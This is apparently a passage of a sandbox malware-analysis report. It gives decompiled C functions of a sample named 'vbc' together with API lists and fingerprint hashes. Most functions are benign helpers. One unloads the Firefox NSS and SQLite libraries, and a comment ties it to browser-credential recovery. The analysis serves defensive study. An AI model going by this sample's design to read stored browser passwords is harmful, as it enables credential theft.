                                                                                                                                                    • memcpy.MSVCRT ref: 0040EA04
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                                                                                    Strings
                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                                                                    • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                                                                                    • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                                                                                                    • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                                                                                    • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E00404837(void* __ecx) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				char _v12;
                                                                                                                                                    				struct HWND__* _t6;
                                                                                                                                                    				_Unknown_base(*)()* _t11;
                                                                                                                                                    				struct HWND__* _t15;
                                                                                                                                                    				void* _t20;
                                                                                                                                                    				struct HINSTANCE__* _t23;
                                                                                                                                                    
                                                                                                                                                    				_v12 = 8;
                                                                                                                                                    				_v8 = 0xff;
                                                                                                                                                    				_t15 = 0;
                                                                                                                                                    				_t20 = 0;
                                                                                                                                                    				_t23 = LoadLibraryA("comctl32.dll");
                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                    					L5:
                                                                                                                                                    					__imp__#17();
                                                                                                                                                    					_t6 = 1;
                                                                                                                                                    					L6:
                                                                                                                                                    					if(_t6 != 0) {
                                                                                                                                                    						return 1;
                                                                                                                                                    					} else {
                                                                                                                                                    						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
                                                                                                                                                    						return 0;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                                    					_t20 = 1;
                                                                                                                                                    					_t15 =  *_t11( &_v12);
                                                                                                                                                    				}
                                                                                                                                                    				FreeLibrary(_t23);
                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                    					goto L5;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t6 = _t15;
                                                                                                                                                    					goto L6;
                                                                                                                                                    				}
                                                                                                                                                    			}

                                                                                                                                                    0x00404844
                                                                                                                                                    0x0040484b
                                                                                                                                                    0x00404852
                                                                                                                                                    0x00404854
                                                                                                                                                    0x0040485c
                                                                                                                                                    0x00404860
                                                                                                                                                    0x0040488a
                                                                                                                                                    0x0040488a
                                                                                                                                                    0x00404892
                                                                                                                                                    0x00404893
                                                                                                                                                    0x00404898
                                                                                                                                                    0x004048b5
                                                                                                                                                    0x0040489a
                                                                                                                                                    0x004048a7
                                                                                                                                                    0x004048b0
                                                                                                                                                    0x004048b0
                                                                                                                                                    0x00404898
                                                                                                                                                    0x00404868
                                                                                                                                                    0x00404870
                                                                                                                                                    0x00404876
                                                                                                                                                    0x00404879
                                                                                                                                                    0x00404879
                                                                                                                                                    0x0040487c
                                                                                                                                                    0x00404884
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404886
                                                                                                                                                    0x00404886
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404886

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll,75144DE0,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 00404856
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040487C
                                                                                                                                                    • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040488A
                                                                                                                                                    • MessageBoxA.USER32 ref: 004048A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                    • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                                                                                    • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                                                                                                    • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                                                                                    • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E004081B5(void* __eflags, char* _a4) {
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t3;
                                                                                                                                                    				int _t6;
                                                                                                                                                    
                                                                                                                                                    				_t3 = E0040614B(_a4);
                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                    					strcpy(0x4171b8, _a4);
                                                                                                                                                    					strcpy(0x4172c0, "general");
                                                                                                                                                    					_t6 = GetPrivateProfileIntA(0x4172c0, "rtl", 0, 0x4171b8);
                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                    					 *0x417304 =  ~(_t6 - 1) + 1;
                                                                                                                                                    					E00407DC1(0x417308, "charset", 0x3f);
                                                                                                                                                    					E00407DC1(0x417348, "TranslatorName", 0x3f);
                                                                                                                                                    					return E00407DC1(0x417388, "TranslatorURL", 0xff);
                                                                                                                                                    				}
                                                                                                                                                    				return _t3;
                                                                                                                                                    			}


                                                                                                                                                    0x004081b9
                                                                                                                                                    0x004081c1
                                                                                                                                                    0x004081cf
                                                                                                                                                    0x004081df
                                                                                                                                                    0x004081f0
                                                                                                                                                    0x004081f9
                                                                                                                                                    0x00408208
                                                                                                                                                    0x0040820d
                                                                                                                                                    0x0040821e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040823b
                                                                                                                                                    0x0040823c

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                                                                    • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                                                                                                    • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 004081F0
                                                                                                                                                      • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                                                                                    • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                    • API String ID: 185930432-2094606381
                                                                                                                                                    • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                                                                                    • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                                                                                                    • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                                                                                    • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
#include <windows.h>

/* Unloads the Mozilla NSS / SQLite libraries (nss3.dll, sqlite3.dll,
 * mozsqlite3.dll) if they are currently mapped into the process. These are
 * the libraries the embedded browser-credential recovery code loads to read
 * Firefox profile databases; this routine is its cleanup. */
BOOL E0040DEA9(void) {
	BOOL _t3;
	HMODULE _t5;
	HMODULE _t6;
	HMODULE _t9;

	_t6 = GetModuleHandleA("nss3.dll");
	_t5 = GetModuleHandleA("sqlite3.dll");
	_t9 = GetModuleHandleA("mozsqlite3.dll");
	/* the decompiler reused _t3 to hold the mozsqlite3 handle here; it is only
	 * returned when that handle is NULL, so the value is always 0 */
	_t3 = FALSE;
	if(_t6 != NULL) {
		_t3 = FreeLibrary(_t6);
	}
	if(_t5 != NULL) {
		_t3 = FreeLibrary(_t5);
	}
	if(_t9 != NULL) {
		return FreeLibrary(_t9);
	}
	return _t3;
}

APIs
• GetModuleHandleA.KERNEL32(nss3.dll,751457D0,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
• GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
• GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
• FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
• FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
• FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeHandleLibraryModule
• String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
• API String ID: 662261464-3550686275
• Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
• Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
• Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
• Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 86%
#include <string.h>

/* Decompiled helpers defined elsewhere in this dump (see the APIs list below):
 * E004069D2 does a case-insensitive prefix comparison (strlen/_memicmp) and
 * returns a negative value on mismatch; E00406325 fills a buffer with the
 * Windows directory (GetWindowsDirectoryA + strcpy). */
int E004069D2(char* s, const char* prefix);
void E00406325(char* buf);

/* Converts a path that may carry an NT-style prefix (e.g. "\systemroot\..."
 * or "\??\X:\...") into a drive-letter path, written to __edi. */
char* E0040E172(char* __edi, char* __esi) {
	char _v268[0x105];   /* the decompiler showed this one stack buffer as _v268 and _v267 */
	char* _t15;
	int _t38;
	char* _t48;
	char* _t49;
	char* _t8;

	_t49 = __esi;
	_t48 = __edi;
	if(__esi[1] == 0x3a) {                 /* "X:..." is already a drive path: copy as-is */
		strcpy(_t48, __esi);
		return _t48;
	}
	_t15 = strchr( &(__esi[2]), 0x3a);     /* a later ':' means "prefix + X:\..." */
	if(_t15 != 0) {
		strcpy(_t48, _t15 - 1);            /* copy from the drive letter that precedes the ':' */
		return _t48;
	}
	_t38 = E004069D2(0, "\\systemroot");   /* decompiler shows 0 as the first argument */
	if(_t38 < 0) {
		if( *__esi != 0x5c) {
			strcpy(__edi, __esi);          /* no leading backslash: relative path, copy as-is */
		} else {
			_v268[0] = 0;
			memset( &_v268[1], 0, 0x104);
			E00406325(_v268);
			memcpy(__edi,  _v268, 2);      /* take only "X:" of the Windows directory */
			__edi[2] = 0;
			strcat(__edi, __esi);          /* and append the rooted path */
		}
	} else {
		_v268[0] = 0;
		memset( &_v268[1], 0, 0x104);
		E00406325(_v268);
		strcpy(__edi,  _v268);             /* full Windows directory replaces "\systemroot" */
		_t8 =  &(_t49[0xb]); // 0xb = strlen("\\systemroot")
		strcat(__edi, _t38 + _t8);
	}
	return _t48;
}

APIs
• strchr.MSVCRT ref: 0040E18A
• strcpy.MSVCRT(?,-00000001), ref: 0040E198
  • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
  • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
  • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
• strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
• strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
• memset.MSVCRT ref: 0040E1CF
  • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
  • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
• memset.MSVCRT ref: 0040E217
• memcpy.MSVCRT ref: 0040E232
• strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
• String ID: \systemroot
• API String ID: 1680921474-1821301763
• Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
• Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
• Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
• Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 67%
                                                                                                                                                    			E00405BE4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                    				void* _t30;
                                                                                                                                                    				struct HWND__* _t32;
                                                                                                                                                    				void* _t35;
                                                                                                                                                    				intOrPtr* _t36;
                                                                                                                                                    
                                                                                                                                                    				_t30 = __edx;
                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                    				_push(__ebx);
                                                                                                                                                    				_push(__edi);
                                                                                                                                                    				_t32 =  *(__ecx + 4);
                                                                                                                                                    				_t35 = __ecx + 0xc;
                                                                                                                                                    				 *(_t35 + 0x10) = _t32;
                                                                                                                                                    				GetClientRect(_t32, _t35 + 0xa14);
                                                                                                                                                    				 *(_t35 + 0xa24) =  *(_t35 + 0xa24) & 0x00000000;
                                                                                                                                                    				GetWindow(GetWindow(_t32, 5), 0);
                                                                                                                                                    				do {
                                                                                                                                                    					__eax = E00401657(__edi, __esi);
                                                                                                                                                    					__edi = GetWindow(__edi, 2);
                                                                                                                                                    				} while (__edi != 0);
                                                                                                                                                    				__esi = GetDlgItem;
                                                                                                                                                    				__edi = 0x3ed;
                                                                                                                                                    				GetDlgItem( *(__ebx + 4), 0x3ed) = E0040F037(__eax);
                                                                                                                                                    				 *__esp = 0x3ee;
                                                                                                                                                    				GetDlgItem(??, ??) = E0040F037(__eax);
                                                                                                                                                    				 *__esp = 0x3ef;
                                                                                                                                                    				GetDlgItem( *(__ebx + 4),  *(__ebx + 4)) = E0040F037(__eax);
                                                                                                                                                    				 *__esp = 0x3f4;
                                                                                                                                                    				GetDlgItem( *(__ebx + 4), ??) = E0040F037(__eax);
                                                                                                                                                    				__eax =  *(__ebx + 4);
                                                                                                                                                    				GetDlgItem( *(__ebx + 4), 0x3ed) = SetFocus(__eax);
                                                                                                                                                    				_pop(__edi);
                                                                                                                                                    				_pop(__esi);
                                                                                                                                                    				__ecx = __ebx;
                                                                                                                                                    				_pop(__ebx);
                                                                                                                                                    				_t36 = _t27;
                                                                                                                                                    				 *((intOrPtr*)( *_t36 + 4))(1, _t35);
                                                                                                                                                    				 *((intOrPtr*)( *_t36 + 0x18))();
                                                                                                                                                    				E00406491(_t30,  *((intOrPtr*)(_t36 + 4)));
                                                                                                                                                    				return 0;
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32 ref: 00405BFB
                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405C13
                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405C16
                                                                                                                                                      • Part of subcall function 00401657: GetWindowRect.USER32 ref: 00401666
                                                                                                                                                      • Part of subcall function 00401657: MapWindowPoints.USER32 ref: 00401681
                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C39
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C4B
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C5D
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C6F
                                                                                                                                                    • GetDlgItem.USER32 ref: 00405C7D
                                                                                                                                                    • SetFocus.USER32(00000000), ref: 00405C80
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2187283481-0
                                                                                                                                                    • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                                                                                    • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                                                                                                                    • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                                                                                    • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E00401A50(char* __edi, int __fp0) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				void* _v16;
                                                                                                                                                    				void* _v20;
                                                                                                                                                    				int _v28;
                                                                                                                                                    				int _v36;
                                                                                                                                                    				void* _v40;
                                                                                                                                                    				void* _v44;
                                                                                                                                                    				void* _v48;
                                                                                                                                                    				void* _v52;
                                                                                                                                                    				void* _v56;
                                                                                                                                                    				void* _v60;
                                                                                                                                                    				char _v64;
                                                                                                                                                    				int _t79;
                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                    				int _t81;
                                                                                                                                                    				signed int _t94;
                                                                                                                                                    				int _t98;
                                                                                                                                                    				int _t100;
                                                                                                                                                    				void* _t104;
                                                                                                                                                    				void* _t106;
                                                                                                                                                    				intOrPtr _t115;
                                                                                                                                                    				char _t117;
                                                                                                                                                    				char* _t118;
                                                                                                                                                    				void* _t119;
                                                                                                                                                    				void* _t120;
                                                                                                                                                    				int _t122;
                                                                                                                                                    				signed int _t123;
                                                                                                                                                    				int* _t125;
                                                                                                                                                    				int _t159;
                                                                                                                                                    				int _t165;
                                                                                                                                                    
                                                                                                                                                    				_t159 = __fp0;
                                                                                                                                                    				_t118 = __edi;
                                                                                                                                                    				_t125 = (_t123 & 0xfffffff8) - 0x40;
                                                                                                                                                    				_t79 = strlen(__edi);
                                                                                                                                                    				asm("fldz");
                                                                                                                                                    				_t104 = 0;
                                                                                                                                                    				_v28 = __fp0;
                                                                                                                                                    				_t120 = 0;
                                                                                                                                                    				_t106 = _t119;
                                                                                                                                                    				_v36 = _t79;
                                                                                                                                                    				_v56 = 0;
                                                                                                                                                    				_v52 = 0;
                                                                                                                                                    				_v48 = 0;
                                                                                                                                                    				_v44 = 0;
                                                                                                                                                    				_v60 = 0;
                                                                                                                                                    				_v40 = 0;
                                                                                                                                                    				_v12 = 0x20;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v16 = 0;
                                                                                                                                                    				if(_t79 > 0) {
                                                                                                                                                    					do {
                                                                                                                                                    						_t117 =  *((intOrPtr*)(_t120 + _t118));
                                                                                                                                                    						_v64 = _t117;
                                                                                                                                                    						if(_t117 - 0x41 <= 0x19) {
                                                                                                                                                    							_v56 = _v56 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t117 - 0x61 <= 0x19) {
                                                                                                                                                    							_v52 = _v52 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t117 - 0x30 <= 9) {
                                                                                                                                                    							_v48 = _v48 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t117 - 0x20 <= 0xf) {
                                                                                                                                                    							_v44 = _v44 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t117 - 0x3a <= 6) {
                                                                                                                                                    							_v60 = _v60 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t117 - 0x5b <= 5) {
                                                                                                                                                    							_v60 = _v60 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t117 < 0x7b) {
                                                                                                                                                    							L16:
                                                                                                                                                    							if(_t117 > 0x7e) {
                                                                                                                                                    								goto L17;
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							if(_t117 > 0x7e) {
                                                                                                                                                    								L17:
                                                                                                                                                    								_v40 = _v40 + 1;
                                                                                                                                                    							} else {
                                                                                                                                                    								_v60 = _v60 + 1;
                                                                                                                                                    								goto L16;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						if(_t120 != _t104) {
                                                                                                                                                    							_t94 = 0;
                                                                                                                                                    							if(_v8 <= 0) {
                                                                                                                                                    								L27:
                                                                                                                                                    								_t94 = _t94 | 0xffffffff;
                                                                                                                                                    							} else {
                                                                                                                                                    								L21:
                                                                                                                                                    								if(_t94 < 0 || _t94 >= _v8) {
                                                                                                                                                    									_t115 = 0;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t115 =  *((intOrPtr*)(_v20 + _t94));
                                                                                                                                                    								}
                                                                                                                                                    								if(_t115 == _t117) {
                                                                                                                                                    									goto L28;
                                                                                                                                                    								}
                                                                                                                                                    								_t94 = _t94 + 1;
                                                                                                                                                    								if(_t94 < _v8) {
                                                                                                                                                    									goto L21;
                                                                                                                                                    								} else {
                                                                                                                                                    									goto L27;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							L28:
                                                                                                                                                    							_t104 = 0;
                                                                                                                                                    							if(_t94 < 0) {
                                                                                                                                                    								E004045E8( &_v20, _v64);
                                                                                                                                                    								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
                                                                                                                                                    								_pop(_t106);
                                                                                                                                                    								if(_t98 != 1) {
                                                                                                                                                    									_t47 = _t98 - 2; // -2
                                                                                                                                                    									_t106 = _t47;
                                                                                                                                                    									if(_t106 > 3) {
                                                                                                                                                    										if(_t98 < 6) {
                                                                                                                                                    											if(_t98 > 0xa) {
                                                                                                                                                    												goto L40;
                                                                                                                                                    											}
                                                                                                                                                    										} else {
                                                                                                                                                    											if(_t98 > 0xa) {
                                                                                                                                                    												goto L40;
                                                                                                                                                    											} else {
                                                                                                                                                    												_t159 = _v28 +  *0x414510;
                                                                                                                                                    											}
                                                                                                                                                    											goto L41;
                                                                                                                                                    										}
                                                                                                                                                    									} else {
                                                                                                                                                    										_t159 = _v28 +  *0x414518;
                                                                                                                                                    										goto L41;
                                                                                                                                                    									}
                                                                                                                                                    								} else {
                                                                                                                                                    									_t165 = _v28;
                                                                                                                                                    									goto L30;
                                                                                                                                                    								}
                                                                                                                                                    							} else {
                                                                                                                                                    								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
                                                                                                                                                    								_t165 = _v28;
                                                                                                                                                    								_pop(_t106);
                                                                                                                                                    								if(_t100 != 0) {
                                                                                                                                                    									_t159 = _t165 +  *0x414520;
                                                                                                                                                    								} else {
                                                                                                                                                    									L30:
                                                                                                                                                    									_t159 = _t165 +  *0x414528;
                                                                                                                                                    								}
                                                                                                                                                    								goto L41;
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							E004045E8( &_v20, _v64);
                                                                                                                                                    							L40:
                                                                                                                                                    							_t159 = _v28 +  *0x414508;
                                                                                                                                                    							L41:
                                                                                                                                                    							_v28 = _t159;
                                                                                                                                                    						}
                                                                                                                                                    						_t120 = _t120 + 1;
                                                                                                                                                    					} while (_t120 < _v36);
                                                                                                                                                    				}
                                                                                                                                                    				_v64 = _t104;
                                                                                                                                                    				_t80 = 0x1a;
                                                                                                                                                    				if(_v56 != _t104) {
                                                                                                                                                    					_v64 = _t80;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v52 != _t104) {
                                                                                                                                                    					_v64 = _v64 + _t80;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v48 != _t104) {
                                                                                                                                                    					_v64 = _v64 + 0xa;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v44 != _t104) {
                                                                                                                                                    					_v64 = _v64 + 0x10;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v60 != _t104) {
                                                                                                                                                    					_v64 = _v64 + 0x11;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v40 != _t104) {
                                                                                                                                                    					_v64 = _v64 + 0x1e;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v64 <= _t104) {
                                                                                                                                                    					if(_v20 != _t104) {
                                                                                                                                                    						free(_v20);
                                                                                                                                                    					}
                                                                                                                                                    					_t81 = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					asm("fild dword [esp+0xc]");
                                                                                                                                                    					_push(_t106);
                                                                                                                                                    					_push(_t106);
                                                                                                                                                    					 *_t125 = _t159;
                                                                                                                                                    					L004115B8();
                                                                                                                                                    					_v36 = _t159;
                                                                                                                                                    					 *_t125 =  *0x414500;
                                                                                                                                                    					L004115B8();
                                                                                                                                                    					asm("fdivr qword [esp+0x30]");
                                                                                                                                                    					asm("fistp qword [esp+0x30]");
                                                                                                                                                    					_t122 = _v28;
                                                                                                                                                    					if(_v20 != _t104) {
                                                                                                                                                    						free(_v20);
                                                                                                                                                    					}
                                                                                                                                                    					_t81 = _t122;
                                                                                                                                                    				}
                                                                                                                                                    				return _t81;
                                                                                                                                                    			}

                                                                                                                                                    0x00401b46
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b46
                                                                                                                                                    0x00401b4b
                                                                                                                                                    0x00401b4b
